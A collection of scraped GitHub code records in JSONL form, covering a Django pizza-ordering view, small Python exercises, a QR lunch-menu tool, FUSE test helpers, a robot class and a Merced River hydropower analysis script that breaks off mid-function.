DinnerPlatters.objects.get(platter_item__platter = item_name, size = 'Small').price,\n \"dinnerplatter\": True\n }\n return render(request, \"orders/items.html\", context)\n\n\n#displaying the price \ndef price(request, item_name, size):\n try:\n print(Subs.objects.get(subs_items__sub = item_name, size = size).price)\n context = {\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = size).price\n }\n except Subs.DoesNotExist:\n context = {\n \"price\": DinnerPlatters.objects.get(platter_item__platter = item_name, size = size).price\n }\n return JsonResponse({\"context\": context})\n \ndef pizza_price(request, item_name, size, no_of_toppings):\n if item_name == \"Regular Pizza\":\n context = {\n \"price\": Regular_Pizza.objects.get(size = size, topping = no_of_toppings).price\n 
}\n else:\n context = {\n \"price\": Sicilian_Pizza.objects.get(size = size, topping = no_of_toppings).price\n }\n return JsonResponse({\"context\": context})\n ","repo_name":"Habiba-Naeem/Pinnochio-pizza-and-subs-for-cs50","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40272895944","text":"# スーパーFizzBuzz!\nfor i in range(1, int(input()) + 1):\n\tans = \"\"\n\tif i % 2 == 0:\n\t\tans += \"a\"\n\tif i % 3 == 0:\n\t\tans += \"b\"\n\tif i % 4 == 0:\n\t\tans += \"c\"\n\tif i % 5 == 0:\n\t\tans += \"d\"\n\tif i % 6 == 0:\n\t\tans += \"e\"\n\t# 出力\n\tif ans == \"\":\n\t\tprint(i)\n\telse:\n\t\tprint(ans)\n","repo_name":"satoooh/procon","sub_path":"AtCoder/others/nikkei2019-2-qual/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"16573904567","text":"import pandas as pd\r\nimport qrcode\r\nimport json\r\nimport datetime\r\nfrom PIL import Image\r\n\r\n# Paso 1: Leer la base de datos de Excel\r\ndef leer_menu(fecha_actual):\r\n try:\r\n menu_df = pd.read_excel('menu.xlsx')\r\n opciones_almuerzo = menu_df[menu_df['Fecha'] == fecha_actual]\r\n return opciones_almuerzo\r\n except FileNotFoundError:\r\n print(\"El archivo 'menu.xlsx' no se encontró. Asegúrate de que el archivo existe y tiene el formato adecuado.\")\r\n return None\r\n\r\n# Paso 2: Permitir al usuario seleccionar alimentos y cantidades\r\ndef seleccionar_alimentos(opciones_almuerzo):\r\n if opciones_almuerzo is None:\r\n return None\r\n \r\n for index, row in opciones_almuerzo.iterrows():\r\n print(f\"Opciones de almuerzo para hoy {row['Fecha']}: \")\r\n print(f\"1. Sopa: {row['Sopa']}\")\r\n print(f\"2. Proteico: {row['Proteico']}\")\r\n print(f\"3. Cereal: {row['Cereal']}\")\r\n print(f\"4. Tubérculo: {row['Tubérculo']}\")\r\n print(f\"5. Vegetariano: {row['Vegetariano']}\")\r\n \r\n alimentos_seleccionados = {}\r\n \r\n while True:\r\n opcion = input(\"Seleccione un alimento por número (o escriba 'terminar' para finalizar): \").strip().lower()\r\n if opcion == 'terminar':\r\n break\r\n \r\n if opcion.isdigit():\r\n opcion_num = int(opcion)\r\n if opcion_num >= 1 and opcion_num <= 5:\r\n if opcion_num==1:\r\n StringComida=row['Sopa']\r\n if opcion_num==2:\r\n StringComida=row['Proteico']\r\n if opcion_num==3:\r\n StringComida=row['Cereal']\r\n if opcion_num==4:\r\n StringComida=row['Tubérculo']\r\n if opcion_num==5:\r\n StringComida=row['Vegetariano']\r\n\r\n cantidad = (input(f\"Ingrese la cantidad de porciones de {StringComida} (Escribe 'ayuda' si no conoces las porciones): \"))\r\n if cantidad == \"ayuda\":\r\n im=Image.open(\"Porcionamiento.png\")\r\n im.show()\r\n cantidad = (input(f\"Ingrese la cantidad de porciones de {StringComida}: \"))\r\n cantidad=int(cantidad)\r\n columna = opciones_almuerzo.columns[opcion_num]\r\n if cantidad >5:\r\n cantidad=5\r\n elif cantidad <1:\r\n cantidad=1\r\n alimentos_seleccionados[columna] = cantidad\r\n else:\r\n print(\"Número de opción no válido. Intente nuevamente.\")\r\n else:\r\n print(\"Entrada no válida. 
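The loop above maps divisibility by 2-6 onto the letters a-e; the same behaviour falls out of a rule table, which keeps the divisor/letter pairs in one place. A standalone sketch:

# Table-driven variant of the divisor-to-letter FizzBuzz above.
RULES = [(2, "a"), (3, "b"), (4, "c"), (5, "d"), (6, "e")]

def super_fizzbuzz(n):
    for i in range(1, n + 1):
        # Concatenate the letters of every divisor that divides i,
        # falling back to the number itself when none do.
        ans = "".join(letter for d, letter in RULES if i % d == 0)
        print(ans or i)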
Intente nuevamente.\")\r\n \r\n return alimentos_seleccionados\r\n\r\n# Paso 3: Generar un código QR con las selecciones del usuario\r\ndef generar_qr(selecciones):\r\n qr = qrcode.QRCode(\r\n version=1,\r\n error_correction=qrcode.constants.ERROR_CORRECT_L,\r\n box_size=10,\r\n border=4,\r\n )\r\n \r\n selecciones_json = json.dumps(selecciones)\r\n \r\n qr.add_data(selecciones_json)\r\n qr.make(fit=True)\r\n \r\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\r\n img.save(\"codigo_qr.png\")\r\n\r\ntry:\r\n # Obtener la fecha actual\r\n fecha_actual = datetime.datetime.now().strftime(\"%b-%d\")\r\n\r\n # Paso 1: Leer el menú para la fecha actual\r\n opciones_almuerzo = leer_menu(fecha_actual)\r\n\r\n # Paso 2: Permitir al usuario seleccionar alimentos y cantidades\r\n alimentos_seleccionados = seleccionar_alimentos(opciones_almuerzo)\r\n\r\n if alimentos_seleccionados:\r\n # Paso 3: Generar un código QR con las selecciones del usuario\r\n generar_qr(alimentos_seleccionados)\r\n\r\n print(\"Código QR generado con las selecciones de alimentos.\")\r\n print(f\"Alimentos seleccionados: {alimentos_seleccionados}\")\r\n else:\r\n print(\"No se pudieron seleccionar alimentos.\")\r\nexcept Exception as e:\r\n print(f\"Ocurrió un error: {str(e)}\")","repo_name":"JuandaGrande/DigiAlmuerzos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"41751435694","text":"# Method-2 Iterative Method\ndef firstUniqueCharacter(str):\n for i in range(len(str)):\n isFound = True\n for j in range(len(str)):\n if i == j:\n continue\n if str[i] == str[j]:\n isFound = False\n break\n if(isFound):\n return i\n return -1\n\n# Time Complexity : O(n^2)\n# Space Complexity : O(1)","repo_name":"OrionJoshi/Competitive_Programming","sub_path":"19. 
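generar_qr above stores the selections as a JSON string inside the QR image. A minimal round-trip sketch of that payload format (column names such as "Sopa" come from the menu spreadsheet the script assumes):

import json
import qrcode

selections = {"Sopa": 2, "Proteico": 1}
# qrcode.make() is the one-call form of the QRCode(...) setup used above.
qrcode.make(json.dumps(selections)).save("codigo_qr.png")
# A scanner returns the JSON text, so the dict is recoverable verbatim.
assert json.loads(json.dumps(selections)) == selections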
First Unique Character in a String/Method-2.py","file_name":"Method-2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"82"} +{"seq_id":"30614351495","text":"# Write a program that prompts for a file name, then opens that file and reads through the file, \n# looking for lines of the form:\n# X-DSPAM-Confidence: 0.8475\n# Count these lines and extract the floating point values from each of the lines and compute the \n# average of those values and produce an output as shown below.\n# You can download the sample data at http://www.pythonlearn.com/code/mbox-short.txt when you are \n# testing below enter mbox-short.txt as the file name.\n# Average spam confidence: 0.750718518519\n\nfile = input(\"Enter the file name:\")\nfHandle = open(file)\ncount = 0\nts = 0\n\nfor line in fHandle:\n\tif not line.startswith(\"X-DSPAM-Confidence:\"): continue\n\tpos = line.find(\"0\")\n\tts += float(line[pos:])\n\tcount += 1\n\naverage = ts / count\nprint(\"Average spam confidence = \",average)\n\n\n","repo_name":"aabs7/Python-for-everybody-Specialization","sub_path":"CourseII/assignment7.2.py","file_name":"assignment7.2.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13958743056","text":"# Define Global Variables\r\nimport dna\r\n\r\nscreen_width = 700\r\nscreen_height = 700\r\n\r\nmale = \"M\"\r\nfemale = \"F\"\r\nlight = \"Light\"\r\nmid = \"Mid\"\r\ndark = \"Dark\"\r\nfood_generator = 0\r\n\r\nrabbits = []\r\nwater_sources = []\r\nfoxes = []\r\nfood = []\r\nrocks = []\r\n\r\nfox_spawn_numbers = [6, 15, 30, 60, 70, 100, 200, 9000000000]\r\nind = 0\r\n\r\npop_timer = 0\r\ndeaths = 0\r\nthirst_deaths = 0\r\nhunger_deaths = 0\r\nfox_deaths = 0\r\nnum_males = 0\r\nnum_females = 0\r\nmax_population = []\r\npopulation_over_time = []\r\ngenes = []\r\nlifespans = []\r\n\r\nr_light = (166, 111, 111)\r\nr_mid = (105, 68, 68)\r\nr_dark = (77, 50, 50)\r\ngrass_green = (27, 207, 84)\r\nfood_green = (7, 112, 40)\r\nwater_blue = (14, 90, 204)\r\nfox_orange = (247, 144, 0)\r\nrock_gray = (96, 88, 97)\r\n","repo_name":"AKenney31/RabbitSimulator","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20076195793","text":"import stdio\nimport sys\nfrom blob_finder import BlobFinder\nfrom picture import Picture\n\n\n# Takes an integer P, a float tau, a float delta, and a sequence of JPEG\n# filenames as command-line arguments; identifies the beads in each JPEG\n# image using BlobFinder; and writes out (one per line, formatted with 4\n# decimal places to the right of decimal point) the radial distance that\n# each bead moves from one frame to the next (assuming it is no more than\n# delta).\ndef main():\n P = int(sys.argv[1])\n tau = float(sys.argv[2])\n delta = float(sys.argv[3])\n seq = sys.argv[4:]\n test = []\n for i in range(1, len(seq)):\n pic = Picture(seq[i - 1])\n bf = BlobFinder(pic, tau)\n beads = bf.getBeads(P)\n pic = Picture(seq[i])\n bf = BlobFinder(pic, tau)\n beads2 = bf.getBeads(P)\n for q in beads2:\n for a in beads:\n test += [q.distanceTo(a)]\n if min(test) <= delta:\n stdio.writef('%.4f\\n', min(test))\n test = []\n\nif __name__ == '__main__':\n 
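Method-2 above is the quadratic pairwise scan; the same answer comes out of a single counting pass in linear time. A self-contained sketch:

from collections import Counter

def first_unique_character(s):
    # Count every character once, then return the index of the first
    # character that occurs exactly once.
    counts = Counter(s)
    for i, ch in enumerate(s):
        if counts[ch] == 1:
            return i
    return -1

assert first_unique_character("leetcode") == 0
assert first_unique_character("aabb") == -1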
main()\n","repo_name":"hshastri/Atomic-Nature","sub_path":"bead_tracker.py","file_name":"bead_tracker.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"22589363181","text":"#!/usr/bin/env python3\nimport subprocess\nimport pytest\nimport os\nimport stat\nimport time\nfrom os.path import join as pjoin\nimport sys\nimport re\nimport itertools\n\nbasename = os.path.dirname(os.path.abspath(__file__))\nfusermount3_dir = \"/home/yy354/opt-dev/bin\"\n\n\ndef test_printcap():\n cmdline = base_cmdline + [ pjoin(basename, 'example', 'printcap') ]\n proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE,\n universal_newlines=True)\n (stdout, _) = proc.communicate(30)\n assert proc.returncode == 0\n\n proto = None\n caps = set()\n for line in stdout.split('\\n'):\n if line.startswith('\\t'):\n caps.add(line.strip())\n continue\n\n hit = re.match(r'Protocol version: (\\d+)\\.(\\d+)$', line) \n if hit:\n proto = (int(hit.group(1)), int(hit.group(2)))\n\n return (proto, caps)\n\n\ndef wait_for_mount(mount_process, mnt_dir,\n test_fn=os.path.ismount):\n elapsed = 0\n while elapsed < 20:\n if test_fn(mnt_dir):\n print(\" -------- Fuse mount succeed -------\")\n return True\n if mount_process.poll() is not None:\n pytest.fail('file system process terminated prematurely')\n time.sleep(0.1)\n elapsed += 0.1\n pytest.fail(\"mountpoint failed to come up\")\n\n\ndef compare_dirs(output, expected):\n for dir in output:\n if not dir in expected:\n return False\n for dir in expected:\n if not dir in output:\n return False\n return True\n \n\ndef cleanup(mount_process, mnt_dir):\n # Don't bother trying Valgrind if things already went wrong\n\n if 'bsd' in sys.platform or 'dragonfly' in sys.platform:\n cmd = [ 'umount', '-f', mnt_dir ]\n else:\n cmd = [pjoin(basename, 'util', 'fusermount3'),\n '-z', '-u', mnt_dir]\n subprocess.call(cmd, stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT)\n mount_process.terminate()\n try:\n mount_process.wait(1)\n except subprocess.TimeoutExpired:\n mount_process.kill()\n\ndef umount(mnt_dir):\n\n if 'bsd' in sys.platform or 'dragonfly' in sys.platform:\n cmdline = [ 'umount', mnt_dir ]\n else:\n # fusermount3 will be setuid root, so we can only trace it with\n # valgrind if we're root\n if os.getuid() == 0:\n cmdline = base_cmdline\n else:\n cmdline = []\n cmdline = cmdline + [ pjoin(fusermount3_dir, 'fusermount3'),\n '-z', '-u', mnt_dir ]\n subprocess.check_call(cmdline)\n assert not os.path.ismount(mnt_dir)\n\n \n\n\n\ndef safe_sleep(secs):\n '''Like time.sleep(), but sleep for at least *secs*\n `time.sleep` may sleep less than the given period if a signal is\n received. 
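The bead tracker above pairs each bead in a frame with its nearest neighbour in the previous frame and keeps the displacement when it is within delta. The same step over plain (x, y) tuples, so it runs without the Picture/BlobFinder classes:

import math

def displacements(prev_beads, next_beads, delta):
    out = []
    for q in next_beads:
        # Distance to the closest bead of the previous frame.
        d = min(math.dist(q, a) for a in prev_beads)
        if d <= delta:
            out.append(d)
    return out

print(displacements([(0, 0), (5, 5)], [(0.3, 0.4), (9, 9)], delta=2.0))  # [0.5]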
This function ensures that we sleep for at least the\n desired time.\n '''\n\n now = time.time()\n end = now + secs\n while now < end:\n time.sleep(end - now)\n now = time.time()\n\n\ndef powerset(iterable):\n s = list(iterable)\n return itertools.chain.from_iterable(\n itertools.combinations(s, r) for r in range(len(s)+1))\n\n\n# Use valgrind if requested\nif os.environ.get('TEST_WITH_VALGRIND', 'no').lower().strip() \\\n not in ('no', 'false', '0'):\n base_cmdline = [ 'valgrind', '-q', '--' ]\nelse:\n base_cmdline = []\n\n# Try to use local fusermount3\nos.environ['PATH'] = '%s:%s' % (pjoin(basename, 'util'), os.environ['PATH'])\n# Put example binaries on PATH\nos.environ['PATH'] = '%s:%s' % (pjoin(basename, 'example'), os.environ['PATH'])\n\ntry:\n (fuse_proto, fuse_caps) = test_printcap()\nexcept:\n # Rely on test to raise error\n fuse_proto = (0,0)\n fuse_caps = set()\n","repo_name":"Derecho-Project/cascade","sub_path":"src/service/fuse/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"82"} {"seq_id":"6718971293","text":"from ClassAppliance import Appliance\n\n\nclass Robot(Appliance):\n def __init__(self, name, power=False, battery=101, skills=None, phrases=None):\n super().__init__(power)\n if skills is None and phrases is None:\n skills = [\"Say Robot name\", \"Charge\", \"Battery Status\", \"Learn phrases\"]\n phrases = []\n self.__name = name\n self.__battery = battery\n self.__skills = skills\n self.__phrases = phrases\n\n @property\n def name(self):\n return self.__name\n\n @property\n def battery(self):\n return self.__battery\n\n @property\n def skills(self):\n return self.__skills\n\n @property\n def phrases(self):\n return self.__phrases\n\n @name.setter\n def name(self, name):\n if self.power == \"On\":\n self.__name = name\n\n @phrases.setter\n def phrases(self, *args):\n if self.power == \"On\":\n self.__phrases.extend(args)\n\n def say_robot_name(self):\n if self.power == \"On\":\n self.__battery -= 1\n return f\"Hi, Nice to meet you\\nMy name is {self.name}\"\n else:\n return \"...\"\n\n def charge(self):\n if self.power == \"On\":\n if self.battery < 101:\n self.__battery = 101\n return f\"Gimme a minute to charge...\\n DONE\"\n else:\n return f\"I'm fully charged\"\n else:\n return '...'\n\n def battery_status(self):\n if self.power == \"On\":\n self.__battery -= 1\n if self.battery <= 25:\n return f\"Battery: {self.battery}%\\n\" \\\n f\"I think I might need a little charge\"\n\n elif self.battery < 100:\n return f\"Battery: {self.battery}%\\n\"\n\n elif self.battery >= 100:\n return f\"Battery: {self.battery}%\\n\" \\\n f\"I'm full!\"\n else:\n return f\"...\"\n\n def learn_phrase(self, phrase):\n while len(self.phrases) < 6 and self.power == \"On\":\n if phrase not in self.phrases:\n self.phrases.append(phrase)\n self.__battery -= 5\n return f'Phrase Added'\n else:\n print(\"I know that one, teach me another phrase\")\n phrase = input('>>> ')\n else:\n if self.power == \"On\":\n return f'Memory full'\n else:\n return f'...'\n\n def show_phrases(self):\n if self.power == \"On\":\n self.__battery -= 3\n print('I know these phrases:\\n')\n for index in range(len(self.phrases)):\n print(f'|{index + 1}|{self.phrases[index]}|')\n return f'Done'\n else:\n return '...'\n\n def show_a_phrase(self, phrase_number):\n if self.power == 'On':\n self.__battery -= 3\n for index in range(len(self.phrases)):\n if index == phrase_number - 1:\n 
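The powerset helper in util.py above enumerates subsets grouped by size; a quick standalone check of its output:

import itertools

def powerset(iterable):
    s = list(iterable)
    return itertools.chain.from_iterable(
        itertools.combinations(s, r) for r in range(len(s) + 1))

print(list(powerset([1, 2])))  # [(), (1,), (2,), (1, 2)]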
return f'{self.phrases[index]}'\n else:\n return f'Phrase not found!\\nbe sure you put the right phrase number...'\n else:\n return '...'\n\n","repo_name":"MattV-Fayesg/RandomClasses","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"28044645698","text":"import matplotlib.pyplot as plt\n# from matplotlib import pylab\nimport math\nimport numpy as np\n\ny=[]\nw=[]\nf = open(\"accuracy.txt\", \"r\")\nfor each in f:\n # TO IGNORE VALUES STARTING FROM 0.0\n # if each[0:3] != \"0.0\": \n each = float(each)*100\n each1 = round(each,2)\n w.append(each1)\n math.floor(each)\n each = int(each)\n y.append(each)\n \nf.close()\n\n# w.sort()\n# y.sort()\n\nq=len(y)+1\nfig ,ax = plt.subplots(figsize=(14,10))\n\nx=np.arange(0,10,0.1)\nz=[]\nfor i in range(len(y)):\n z.append(i+1)\n\nplt.scatter(z,y)\nplt.plot(z,y)\nplt.ylim([0,100])\nplt.xlim([0,q])\n\n# FOR CO-ORDINATES\n# for i,j in zip(z,w):\n# plt.text(i,j+0.5,'({},{})'.format(i,j),fontdict={'fontsize':12})\n\nplt.xlabel('Accuracy',fontdict={'fontsize':20})\nplt.ylabel('Test-cases',fontdict={'fontsize':20})\nplt.title('Accuracy Trends',fontsize=25,color=\"blue\")\nplt.show()\n\n","repo_name":"Diplo2by/Easy_CT","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"43263022102","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.dates as mdates\nimport seaborn as sns\nimport numpy as np\n\nreservoirs = [\"node/Lake McClure/storage\", \"node/Lake McClure/observed storage\"]\npowerhouses = [\"node/New Exchequer PH/Fixed head\", \"node/New Merced Falls PH/Fixed head\", \"node/New McSwain PH/Fixed head\"]\npowerhouse_flows = [\"MERCE-L-CON3 [link]\", \"Merced PH Inflow\", \"McSwain PH Inflow\"]\nph_gauge = [\"node/Lake McClure Inflow/flow\", \"MERCE-L-CON2 [link]\", \"MERCE-L-CON4 [link]\", \"node/Near Stevinson_11272500/flow\"]\nifrs = [\"node/blwNewExchequerPH/flow\", \"node/Merced R below Crocker-Huffman Dam/flow\", \"Lake McClure Flood Control [node]\"]\nifrs_req = [\"node/blwNewExchequerPH/requirement\", \"node/Merced R below Crocker-Huffman Dam/requirement\", \"node/Lake McClure Flood Control [node]/requirement\"]\n\n\ndef change_month(month):\n if month == 10:\n return 1\n elif month == 11:\n return 2\n elif month == 12:\n return 3\n elif month == 1:\n return 4\n elif month == 2:\n return 5\n elif month == 3:\n return 6\n elif month == 4:\n return 7\n elif month == 5:\n return 8\n elif month == 6:\n return 9\n elif month == 7:\n return 10\n elif month == 8:\n return 11\n else:\n return 12\n\ndef change_season(month):\n if month in [1,2,3]:\n return 1\n elif month in [4,5,6]:\n return 2\n elif month in [7,8,9]:\n return 3\n else:\n return 4\n\ndef generate_csv_climate():\n global reservoirs\n global powerhouses\n global ph_gauge\n # Generate Hydropower Generation\n water_density = 1000\n gravity = 9.81\n efficiency = 0.9\n mcm_to_cms = 1000000 / (24 * 3600)\n\n climate_scenarios = [\"CanESM2_rcp45\", \"CanESM2_rcp85\", \"CNRM-CM5_rcp45\", \"CNRM-CM5_rcp85\", \"HadGEM2-ES_rcp45\",\n \"HadGEM2-ES_rcp85\", \"MIROC5_rcp45\", \"MIROC5_rcp85\"]\n climate_change_scenarios = pd.read_csv(\"climate_change.csv\", index_col=[0])\n return_csv = pd.DataFrame()\n return_csv[\"Recorder\"] = climate_change_scenarios[climate_scenarios[1] + \"/Recorder\"]\n 
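The parsing loop in graph.py above keeps two views of each accuracy value, a 2-decimal percentage and a truncated integer. Both lists in one pass, assuming the same accuracy.txt of one fraction per line:

with open("accuracy.txt") as f:
    vals = [float(line) * 100 for line in f]
w = [round(v, 2) for v in vals]  # 2-decimal percentages for labels
y = [int(v) for v in vals]       # int() truncation matches math.floor for these non-negative values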
return_csv[\"WYT_Year_Type\"] = climate_change_scenarios[climate_scenarios[0] + \"/WYT_Year_Type\"]\n return_csv[\"Water_Year\"] = climate_change_scenarios[climate_scenarios[0] + \"/Water_Year\"]\n for climate_scenario in climate_scenarios:\n results_csv = climate_change_scenarios.filter(regex=climate_scenario)\n\n return_csv[climate_scenario + \"/Lake McClure Storage\"] = results_csv[\n climate_scenario + \"/node/Lake McClure/storage\"] * 0.81071318210885\n\n # 1 Inflow to McClure\n return_csv[climate_scenario + \"/Lake McClure Inflow\"] = (\n results_csv[climate_scenario + \"/node/Lake McClure Inflow/flow\"] * mcm_to_cms)\n # 2 Outflow from Merced Basin\n return_csv[climate_scenario + \"/node/Basin Outflow/flow\"] = results_csv[\n climate_scenario + \"/node/Near Stevinson_11272500/flow\"] * 0.81071318210885\n # 3 Flood days Out of Lake McClure\n return_csv[climate_scenario + \"/Lake McClure Outflow Flood Days\"] = ((results_csv[\n climate_scenario + \"/MERCE-L-CON2 [link]\"] +\n results_csv[\n climate_scenario + \"/MERCE-L-CON4 [link]\"]) > 15.9).astype(\n int)\n # Flood days Into Lake McClure\n return_csv[climate_scenario + \"/Lake McClure Inflow Flood Days\"] = (\n (results_csv[climate_scenario + \"/node/Lake McClure Inflow/flow\"] * mcm_to_cms) > 14.68).astype(int)\n\n # 5 No. of days IRFs not being met\n for index, value in enumerate(ifrs):\n # Sum up time the IFR did not pass\n return_csv[climate_scenario + \"/\" + value + \"/ifr_not_met\"] = (\n results_csv[climate_scenario + \"/\" + ifrs_req[index]] - results_csv[\n climate_scenario + \"/\" + ifrs[index]] > 0.0001).astype(int)\n\n # 6 Total HP production (MWH)\n return_csv[climate_scenario + \"/Hydropower Production\"] = 0\n for index, powerhouse in enumerate(powerhouses):\n return_csv[climate_scenario + \"/Hydropower Production\"] = return_csv[\n climate_scenario + \"/Hydropower Production\"] + \\\n (efficiency * water_density * gravity * \\\n results_csv[climate_scenario + \"/\" + powerhouse] \\\n * results_csv[\n climate_scenario + \"/\" + powerhouse_flows[\n index]] / 3600)\n return return_csv\n\ndef generate_csv_historic():\n global reservoirs\n global powerhouses\n global ph_gauge\n # Generate Hydropower Generation\n water_density = 1000\n gravity = 9.81\n efficiency = 0.9\n mcm_to_cms = 1000000 / (24 * 3600)\n\n columns = [\"Recorder\", \"Release Requirement\", \"WYT_Year_Type\", \"Water_Year\"]\n columns = columns + reservoirs + powerhouses + powerhouse_flows + ph_gauge + ifrs + ifrs_req\n\n results_csv = pd.read_csv(\"merced/results.csv\", skiprows=[1])\n wyt_csv = pd.read_csv(\"merced/s3_imports/WYT.csv\", index_col=[0])\n results_csv = results_csv[columns].copy()\n return_csv = results_csv[\n [\"Recorder\", \"node/Lake McClure/storage\", \"node/Lake McClure/observed storage\", \"WYT_Year_Type\",\n \"Water_Year\"]].copy()\n return_csv[\"Lake McClure Storage\"] = results_csv[\"node/Lake McClure/storage\"] * 0.81071318210885\n # 1 Inflow to McClure\n return_csv[\"Lake McClure Inflow\"] = (results_csv[\"node/Lake McClure Inflow/flow\"] * mcm_to_cms)\n # 2 Outflow from Merced Basin\n return_csv[\"node/Basin Outflow/flow\"] = results_csv[\"node/Near Stevinson_11272500/flow\"] * 0.81071318210885\n # 3 Flood days Out of Lake McClure\n return_csv[\"Lake McClure Outflow Flood Days\"] = (\n (results_csv[\"MERCE-L-CON2 [link]\"] + results_csv[\"MERCE-L-CON4 [link]\"]) > 15.9).astype(int)\n # 4 Flood Days Into Lake McClure\n return_csv[\"Lake McClure Inflow Flood Days\"] = (\n (results_csv[\"node/Lake McClure Inflow/flow\"] * 
mcm_to_cms) > 14.68).astype(int)\n # 5 No. of days IRFs not being met\n for index, value in enumerate(ifrs):\n # Sum up time the IFR did not pass\n return_csv[value + \"/ifr_not_met\"] = (results_csv[ifrs_req[index]] - results_csv[ifrs[index]] > 0.0001).astype(\n int)\n # 6 Total HP production (MWH)\n return_csv[\"Hydropower Production\"] = 0\n for index, powerhouse in enumerate(powerhouses):\n return_csv[\"Hydropower Production\"] = return_csv[\"Hydropower Production\"] + (\n efficiency * water_density * gravity * results_csv[powerhouse] \\\n * results_csv[powerhouse_flows[index]] / 3600)\n\n return return_csv\n\ndef graph_files(climate_change_csv , historic_csv):\n pd.options.mode.chained_assignment = None\n results_hist_csv = historic_csv\n results_climate_csv = climate_change_csv\n\n for index in range(0,4):\n ## Storage\n if index == 0:\n modify_results_hist_csv = results_hist_csv.iloc[:, [0, 2, 3]]\n results_climate_csv_45 = results_climate_csv.iloc[:, [0, 2, 3, 21, 39, 57]]\n results_climate_csv_85 = results_climate_csv.iloc[:, [0, 2, 12, 30, 48, 66]]\n file_name = \"Storage\"\n y_label = \"Volume (TAF)\"\n y_lim_low = 0\n y_lim_high = 1200\n ##Inflow\n if index == 1:\n modify_results_hist_csv = results_hist_csv.iloc[:,[0,2,6]]\n results_climate_csv_45 = results_climate_csv.iloc[:,[0,2,4,22,40,58]]\n results_climate_csv_85 = results_climate_csv.iloc[:,[0,2,13,31,49,67]]\n file_name = \"Inflow\"\n y_label = \"Discharge (TAF)\"\n y_lim_low = 0\n y_lim_high = 1500\n ##Outflow\n if index == 2:\n modify_results_hist_csv = results_hist_csv.iloc[:,[0,2,7]]\n results_climate_csv_45 = results_climate_csv.iloc[:,[0,2,5,23,41,59]]\n results_climate_csv_85 = results_climate_csv.iloc[:,[0,2,14,32,50,68]]\n file_name = \"Outflow\"\n y_label = \"Discharge (TAF)\"\n y_lim_low = 0\n y_lim_high = 300\n ##HP Production\n if index == 3:\n modify_results_hist_csv = results_hist_csv.iloc[:, [0, 2, 13]]\n results_climate_csv_45 = results_climate_csv.iloc[:, [0, 2, 11, 29, 47, 65]]\n results_climate_csv_85 = results_climate_csv.iloc[:, [0, 2, 20, 38, 56, 74]]\n file_name = \"HP\"\n y_label = \"HP Production (MWh)\"\n y_lim_low = 0\n y_lim_high = 40000\n\n modify_results_hist_csv.columns = ['Date', 'WY', 'Historic']\n modify_results_hist_csv['Month'] = pd.DatetimeIndex(modify_results_hist_csv['Date']).month\n modify_results_hist_csv['Day'] = pd.DatetimeIndex(modify_results_hist_csv['Date']).dayofyear\n\n modify_results_hist_csv[\"WYT_Month\"] = modify_results_hist_csv[\"Month\"].apply(lambda x: change_month(x))\n modify_results_hist_csv[\"WYT_Season\"] = modify_results_hist_csv[\"WYT_Month\"].apply(lambda x: change_season(x))\n\n results_hist_csv_melt = pd.melt(modify_results_hist_csv,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=[\"Historic\"],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n\n results_climate_csv_45.columns = ['Date', 'WY', 'CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5']\n results_climate_csv_85.columns = ['Date', 'WY', 'CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5']\n results_climate_csv_45[\"Date\"] = pd.to_datetime(results_climate_csv_45[\"Date\"])\n results_climate_csv_85[\"Date\"] = pd.to_datetime(results_climate_csv_85[\"Date\"])\n\n results_climate_csv_45['Month'] = results_climate_csv_45[\"Date\"].dt.month\n results_climate_csv_85['Month'] = results_climate_csv_85[\"Date\"].dt.month\n\n results_climate_csv_45[\"WYT_Month\"] = results_climate_csv_45[\"Month\"].apply(lambda x: change_month(x))\n results_climate_csv_85[\"WYT_Month\"] = 
